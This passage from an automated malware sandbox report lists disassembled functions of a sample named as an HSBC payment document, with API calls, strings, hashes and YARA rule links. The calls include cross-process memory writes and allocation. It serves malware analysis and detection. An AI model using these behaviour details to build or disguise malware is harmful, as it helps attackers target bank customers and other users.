Opcode ID: d6f25b8e6d3e87df3349a2978afd191c1ecc4732eda4fc3f2c33aa3e007b7034
Instruction ID: 1a85cc57ef1b384f1a60bb015cb2c3eecce355d6164850f24b4887b18dd7af78
Opcode Fuzzy Hash: d6f25b8e6d3e87df3349a2978afd191c1ecc4732eda4fc3f2c33aa3e007b7034
Instruction Fuzzy Hash: 4521D731702218EBDF109EA49C89EEE7BADEB89751F048025FE09D71D1D6B8CD51C7A1

Function 00795A4D Relevance: 7.6, APIs: 5, Instructions: 70COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00795A6E
GetForegroundWindow.USER32 ref: 00795A85
GetDC.USER32(00000000), ref: 00795AC1
GetPixel.GDI32(00000000,?,00000003), ref: 00795ACD
ReleaseDC.USER32(00000000,00000003), ref: 00795B08

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: c3e0fd5b1120e4851ecf9ec3cf2a49b4c514328f1e903e966280e39f869a8f13
Instruction ID: 11d7a2a2e818e4a2b20ec0505d3f9f5c0c9e3f9d1055e3402eb75193daf36e65
Opcode Fuzzy Hash: c3e0fd5b1120e4851ecf9ec3cf2a49b4c514328f1e903e966280e39f869a8f13
Instruction Fuzzy Hash: DE218075A00114EFDB14EFA4DC88A5ABBF5EF89310F14C079E949D7352CA38AC00CB54

Function 007212F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0072134D
SelectObject.GDI32(?,00000000), ref: 0072135C
BeginPath.GDI32(?), ref: 00721373
SelectObject.GDI32(?,00000000), ref: 0072139C

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: b45b985aa1ead43770876ffafa9ee94e54fdcfd1b6fc78015f78345b809bc16e
Instruction ID: 8a45ab6325c44a8cb77014666c60bce93c87ac41313a2277b5a1e528deb1b0e8
Opcode Fuzzy Hash: b45b985aa1ead43770876ffafa9ee94e54fdcfd1b6fc78015f78345b809bc16e
Instruction Fuzzy Hash: 50216D3080165CEFDB10CF65EC8476A7BA9FB14325F548226F8109A5B1D3BD9891DF98

Function 00784A93 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00784ABA
__beginthreadex.LIBCMT ref: 00784AD8
MessageBoxW.USER32(?,?,?,?), ref: 00784AED
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00784B03
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00784B0A

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
String ID:
API String ID: 3824534824-0
Opcode ID: e1ba3418a4ec3a661c2bb8ca24e1304c1ceef42cd5edead9640f266d194fbb92
Instruction ID: a5210f0951c7bc283edd7d1e6ec0792d72a86bff0e1ba99822e392798018d4c5
Opcode Fuzzy Hash: e1ba3418a4ec3a661c2bb8ca24e1304c1ceef42cd5edead9640f266d194fbb92
Instruction Fuzzy Hash: FC112BB6905259BFCB009FA8DC48A9B7FACFB89324F148269F914D7250D7BDCD0087A5

Function 00778202 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 0077821E
GetLastError.KERNEL32(?,00777CE2,?,?,?), ref: 00778228
GetProcessHeap.KERNEL32(00000008,?,?,00777CE2,?,?,?), ref: 00778237
HeapAlloc.KERNEL32(00000000,?,00777CE2,?,?,?), ref: 0077823E
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00778255

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: 6d61c38ebe6f51170541f5ef83fd911e4c0999bcc4638ebb5b59798185e32da9
Instruction ID: d78e60eca59dc5f6e2086b576fcb02086ba5a1c83b8acb8d7fb697758b729c23
Opcode Fuzzy Hash: 6d61c38ebe6f51170541f5ef83fd911e4c0999bcc4638ebb5b59798185e32da9
Instruction Fuzzy Hash: B5016971380208BFDF204FA6DC4CD6B7BACFF8A796B508569F809C2220DA358C00CA61

Function 0077710A Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00777044,80070057,?,?,?,00777455), ref: 00777127
ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00777044,80070057,?,?), ref: 00777142
lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00777044,80070057,?,?), ref: 00777150
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00777044,80070057,?), ref: 00777160
CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00777044,80070057,?,?), ref: 0077716C

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: 511cf77429d5e06ffdfe38bbed13de9f9fd820f46798c03d723425e97a5671f1
Instruction ID: f43ec4d84ff9f144acd7dabe0c734002e59a2cbe7a0653f17e93af1a119c42ab
Opcode Fuzzy Hash: 511cf77429d5e06ffdfe38bbed13de9f9fd820f46798c03d723425e97a5671f1
Instruction Fuzzy Hash: AA01BC76600208ABCF184FA4DC44AAA7BACEB857A1F108174FD08D6220DB39DD00DBA0

Function 00785244 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00785260
QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0078526E
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00785276
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00785280
Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 007852BC

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: f80e939c5f4456ad9e77a2601ad7acb8a0e6df6732cf5888c442bbbb8c36a69f
Instruction ID: 34019f878774bfe47ff2915b54c86a9a255a156bb4dad4f756b122cf719b184f
Opcode Fuzzy Hash: f80e939c5f4456ad9e77a2601ad7acb8a0e6df6732cf5888c442bbbb8c36a69f
Instruction Fuzzy Hash: D2015771D41A2DDBCF00EFE4E848AEDBB78FB4D311F404166E981B2140CF3859548BA5

Function 0077810A Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00778121
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0077812B
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0077813A
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00778141
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00778157

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 77740d075ce535ec01d442c5f22ae05a24943ccb06234176cc948eb2f056d84a
Instruction ID: 23728d51d4ab55f2f00ad92c8d6389b8b30e3302d0b1df5673957a5d63858597
Opcode Fuzzy Hash: 77740d075ce535ec01d442c5f22ae05a24943ccb06234176cc948eb2f056d84a
Instruction Fuzzy Hash: B4F04F71340308AFEB511FA5EC8CE673BACEF8A799B408039F949C6150CF699D41DA61

Function 0077C1E3 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 0077C1F7
GetWindowTextW.USER32(00000000,?,00000100), ref: 0077C20E
MessageBeep.USER32(00000000), ref: 0077C226
KillTimer.USER32(?,0000040A), ref: 0077C242
EndDialog.USER32(?,00000001), ref: 0077C25C

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: 889b8297a0bbf201752c84ce0b38947acab504064e81b7edc0965364bcfbdcef
Instruction ID: d837b2103cb137a0fa16d1ea7faaaef9edee590f4804a11789a1a9a551b29009
Opcode Fuzzy Hash: 889b8297a0bbf201752c84ce0b38947acab504064e81b7edc0965364bcfbdcef
Instruction Fuzzy Hash: BE01AD30404704ABEB255BA0ED4EB9677B8BB05B06F00826DE586A14E2DBE8A9448B95

Function 007213B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 007213BF
StrokeAndFillPath.GDI32(?,?,0075B888,00000000,?), ref: 007213DB
SelectObject.GDI32(?,00000000), ref: 007213EE
DeleteObject.GDI32 ref: 00721401
StrokePath.GDI32(?), ref: 0072141C

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: ff63a026c3a1b2ee6712c36c1b5e6dadd0172dda41d528f5cd7c99de3b5d1c1a
Instruction ID: 47c87bf0d984049cd908401cebe15fef5f111e8db701221d7ce1bae59505c94a
Opcode Fuzzy Hash: ff63a026c3a1b2ee6712c36c1b5e6dadd0172dda41d528f5cd7c99de3b5d1c1a
Instruction Fuzzy Hash: 85F01930001A8CEBDB155F66EC8C7593BA5BB5532AF58D324E469880F1C77C8995DF18

Function 0078C397 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0078C432
CoCreateInstance.OLE32(007B2D6C,00000000,00000001,007B2BDC,?), ref: 0078C44A

Part of subcall function 00727DE1: _memmove.LIBCMT ref: 00727E22

CoUninitialize.OLE32 ref: 0078C6B7

Strings

.lnk, xrefs: 0078C3C6, 0078C3EE, 0078C3F8

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_memmove
String ID: .lnk
API String ID: 2683427295-24824748
Opcode ID: 1ac4819ceef6a5c3bbcc529352c6d47bd30efd335b2c62fa583664f190d137d6
Instruction ID: f20c9aca4a9b86ab4ed7e0c32630e5b15251ac0135275b39032fc3b8ea207e60
Opcode Fuzzy Hash: 1ac4819ceef6a5c3bbcc529352c6d47bd30efd335b2c62fa583664f190d137d6
Instruction Fuzzy Hash: 3EA17AB1204205EFD304EF54D885EABB7E8FF85314F04492DF195871A2EB75EA09CB62

Function 00732CFB Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON

Download Yara Rule

APIs

Part of subcall function 00740DB6: std::exception::exception.LIBCMT ref: 00740DEC
Part of subcall function 00740DB6: __CxxThrowException@8.LIBCMT ref: 00740E01

Part of subcall function 00727DE1: _memmove.LIBCMT ref: 00727E22

Part of subcall function 00727A51: _memmove.LIBCMT ref: 00727AAB

__swprintf.LIBCMT ref: 00732ECD

Strings

\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00732D66

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
API String ID: 1943609520-557222456
Opcode ID: 03119419182c05ec8d98b023c79efb5e06410b7b9f938de34f393718e4779140
Instruction ID: 91efeeb922c404d1c7a4a7dbdcbc01a0db760da5a579907cf0227b967741748f
Opcode Fuzzy Hash: 03119419182c05ec8d98b023c79efb5e06410b7b9f938de34f393718e4779140
Instruction Fuzzy Hash: 82918C71108311DFD718EF24D88AC6EB7A8EF85710F14491DF9869B2A2EB38ED45CB52

Function 0078B93B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON

Download Yara Rule

APIs

Part of subcall function 00724750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00724743,?,?,007237AE,?), ref: 00724770

CoInitialize.OLE32(00000000), ref: 0078B9BB
CoCreateInstance.OLE32(007B2D6C,00000000,00000001,007B2BDC,?), ref: 0078B9D4
CoUninitialize.OLE32 ref: 0078B9F1

Part of subcall function 00729837: __itow.LIBCMT ref: 00729862
Part of subcall function 00729837: __swprintf.LIBCMT ref: 007298AC

Strings

.lnk, xrefs: 0078B99D, 0078B9AB

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
String ID: .lnk
API String ID: 2126378814-24824748
Opcode ID: 024f704008a47bc5ba5319ae0971a36edd128561eddf4d0bee9ff4af21af0020
Instruction ID: d9c53aba1cb8e9291e974414a0f0b7a199611715f1761740ea764b5be1ec38c0
Opcode Fuzzy Hash: 024f704008a47bc5ba5319ae0971a36edd128561eddf4d0bee9ff4af21af0020
Instruction Fuzzy Hash: AAA135756043119FCB14EF14C484D5ABBE5FF89324F148958F8999B3A2CB39EC45CB91

Function 0077B2F3 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 241comCOMMON

Download Yara Rule

APIs

OleSetContainedObject.OLE32(?,00000001), ref: 0077B4BE

Strings

AutoIt3GUI, xrefs: 0077B436
%{, xrefs: 0077B561
Container, xrefs: 0077B43B

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: ContainedObject
String ID: AutoIt3GUI$Container$%{
API String ID: 3565006973-901144802
Opcode ID: b4cd40ce38eda6c675367cbe3e67ecb5d737e2f0350320311f4d927410678e4f
Instruction ID: 5533aeddd1868ff9261802da21d8c5e2c1bed90411e734690d4a4eb6caf3940d
Opcode Fuzzy Hash: b4cd40ce38eda6c675367cbe3e67ecb5d737e2f0350320311f4d927410678e4f
Instruction Fuzzy Hash: 78913870600601AFDB14DF64C884B6ABBF9FF49754F24856EF94ACB291DB74E841CB60

Function 0074501D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 007450AD

Part of subcall function 007500F0: __87except.LIBCMT ref: 0075012B

Strings

pow, xrefs: 00745085, 007450A2

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: ErrorHandling__87except__start
String ID: pow
API String ID: 2905807303-2276729525
Opcode ID: 7ce5663c142ea4b16d2009411098226b1c64620c13b01f162892fdd19805b65f
Instruction ID: d32c41f706fe54ba9369459031921ae1fbe375a67dab32ea552713205126e364
Opcode Fuzzy Hash: 7ce5663c142ea4b16d2009411098226b1c64620c13b01f162892fdd19805b65f
Instruction Fuzzy Hash: C2515B25908A0587DB157B24C9493BE2F94AB41701F208D5DE8D5862EBEF7C8DCCDACA

Function 00768584 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 148COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 0076862B
_memmove.LIBCMT ref: 00768685

Strings

_s, xrefs: 007686FF, 0076DFDC, 0076DFF8
3cs, xrefs: 0076860C

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: _memmove
String ID: 3cs$_s
API String ID: 4104443479-944816363
Opcode ID: 54a36fb9f7ce09497bfc6d0e7341adf87f162c765c0814f64702f3579cc7ee11
Instruction ID: b67e55d272d885eeb2a838595e6bacb830a9777ad3dcebcf8a787bc79f36ee8a
Opcode Fuzzy Hash: 54a36fb9f7ce09497bfc6d0e7341adf87f162c765c0814f64702f3579cc7ee11
Instruction Fuzzy Hash: F2516EB09006059FDF64CF68C884AAEB7F1FF44304F248629E85BD7251EB39A965CB51

Function 007797F5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122windowCOMMON

Download Yara Rule

APIs

Part of subcall function 007814BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00779296,?,?,00000034,00000800,?,00000034), ref: 007814E6

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0077983F

Part of subcall function 00781487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,007792C5,?,?,00000800,?,00001073,00000000,?,?), ref: 007814B1

Part of subcall function 007813DE: GetWindowThreadProcessId.USER32(?,?), ref: 00781409
Part of subcall function 007813DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0077925A,00000034,?,?,00001004,00000000,00000000), ref: 00781419
Part of subcall function 007813DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0077925A,00000034,?,?,00001004,00000000,00000000), ref: 0078142F

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 007798AC
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 007798F9

Strings

@, xrefs: 00779911

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: feda5a48ebb44feda9e7105170841c2dac42482913f13aa5008aa49709824678
Instruction ID: 776ebfe6c95a1c9752ed44e8c325d83c8e68cbd627d1fe65483ca519c72f0564
Opcode Fuzzy Hash: feda5a48ebb44feda9e7105170841c2dac42482913f13aa5008aa49709824678
Instruction Fuzzy Hash: CA41507690121CBFDF10EFA4CC45ADEBBB8EB49340F108059FA49B7141DA746E45CBA1

Function 007A7946 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,007AF910,00000000,?,?,?,?), ref: 007A79DF
